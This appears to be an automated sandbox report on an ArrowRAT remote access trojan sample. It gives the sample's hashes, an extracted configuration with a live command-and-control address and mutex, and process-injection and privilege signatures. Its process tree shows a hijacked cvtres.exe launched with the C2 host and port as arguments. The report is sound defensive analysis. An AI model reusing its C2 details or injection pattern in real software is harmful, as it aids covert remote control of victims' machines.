Analysis
-
max time kernel
142s -
max time network
42s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
04-09-2022 21:47
Behavioral task
behavioral1
Sample
8573d9e75f2c0ef4e69023fc07bee9cb.exe
Resource
win7-20220812-en
windows7-x64
9 signatures
150 seconds
Behavioral task
behavioral2
Sample
8573d9e75f2c0ef4e69023fc07bee9cb.exe
Resource
win10v2004-20220812-en
windows10-2004-x64
14 signatures
150 seconds
General
-
Target
8573d9e75f2c0ef4e69023fc07bee9cb.exe
-
Size
91KB
-
MD5
8573d9e75f2c0ef4e69023fc07bee9cb
-
SHA1
4f3afbab31505056fd71f462bd52f98f3dd9f8ff
-
SHA256
e5d590f782337416fe7f93aa7f488419f86802500d05ef2fced4ccca7f4e14ae
-
SHA512
11bbaa8c41989d583ca1af59d8c51b80825634807dfcd8fc50f5e8d3190d224ca48139f70e10a2993b9ae1bca599ee0dd1422af5c716f5441c533c1dedef72e7
-
SSDEEP
1536:dbRiQM/57SK3bUzZdQ1iIMvnZlbLxjV3AGq5gWlocT1wzySsd9NJ33B:dbRE57SKsstcnZTJQDgWPaySsdH5x
Score
10/10
Malware Config
Extracted
Family
arrowrat
Botnet
TY
C2
91.134.207.23:5337
Mutex
DFDFrcvff45thfgh4t44gjahdfhhhhca
Signatures
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 784 set thread context of 1272 784 8573d9e75f2c0ef4e69023fc07bee9cb.exe 27 -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 784 8573d9e75f2c0ef4e69023fc07bee9cb.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
description pid Process Token: SeDebugPrivilege 784 8573d9e75f2c0ef4e69023fc07bee9cb.exe Token: SeShutdownPrivilege 2012 explorer.exe Token: SeShutdownPrivilege 2012 explorer.exe Token: SeShutdownPrivilege 2012 explorer.exe Token: SeShutdownPrivilege 2012 explorer.exe Token: SeShutdownPrivilege 2012 explorer.exe Token: SeShutdownPrivilege 2012 explorer.exe Token: SeShutdownPrivilege 2012 explorer.exe Token: SeShutdownPrivilege 2012 explorer.exe Token: 33 1676 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1676 AUDIODG.EXE Token: 33 1676 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1676 AUDIODG.EXE Token: SeShutdownPrivilege 2012 explorer.exe Token: SeShutdownPrivilege 2012 explorer.exe Token: SeShutdownPrivilege 2012 explorer.exe Token: SeShutdownPrivilege 2012 explorer.exe -
Suspicious use of FindShellTrayWindow 24 IoCs
pid Process 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe -
Suspicious use of SendNotifyMessage 16 IoCs
pid Process 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe 2012 explorer.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 784 wrote to memory of 2012 784 8573d9e75f2c0ef4e69023fc07bee9cb.exe 26 PID 784 wrote to memory of 2012 784 8573d9e75f2c0ef4e69023fc07bee9cb.exe 26 PID 784 wrote to memory of 2012 784 8573d9e75f2c0ef4e69023fc07bee9cb.exe 26 PID 784 wrote to memory of 2012 784 8573d9e75f2c0ef4e69023fc07bee9cb.exe 26 PID 2012 wrote to memory of 936 2012 explorer.exe 28 PID 2012 wrote to memory of 936 2012 explorer.exe 28 PID 2012 wrote to memory of 936 2012 explorer.exe 28 PID 784 wrote to memory of 1272 784 8573d9e75f2c0ef4e69023fc07bee9cb.exe 27 PID 784 wrote to memory of 1272 784 8573d9e75f2c0ef4e69023fc07bee9cb.exe 27 PID 784 wrote to memory of 1272 784 8573d9e75f2c0ef4e69023fc07bee9cb.exe 27 PID 784 wrote to memory of 1272 784 8573d9e75f2c0ef4e69023fc07bee9cb.exe 27 PID 784 wrote to memory of 1272 784 8573d9e75f2c0ef4e69023fc07bee9cb.exe 27 PID 784 wrote to memory of 1272 784 8573d9e75f2c0ef4e69023fc07bee9cb.exe 27 PID 784 wrote to memory of 1272 784 8573d9e75f2c0ef4e69023fc07bee9cb.exe 27 PID 784 wrote to memory of 1272 784 8573d9e75f2c0ef4e69023fc07bee9cb.exe 27 PID 784 wrote to memory of 1272 784 8573d9e75f2c0ef4e69023fc07bee9cb.exe 27
Processes
-
C:\Users\Admin\AppData\Local\Temp\8573d9e75f2c0ef4e69023fc07bee9cb.exe"C:\Users\Admin\AppData\Local\Temp\8573d9e75f2c0ef4e69023fc07bee9cb.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\system32\ctfmon.exectfmon.exe3⤵PID:936
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" TY 91.134.207.23 5337 DFDFrcvff45thfgh4t44gjahdfhhhhca2⤵PID:1272
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x1501⤵
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:1120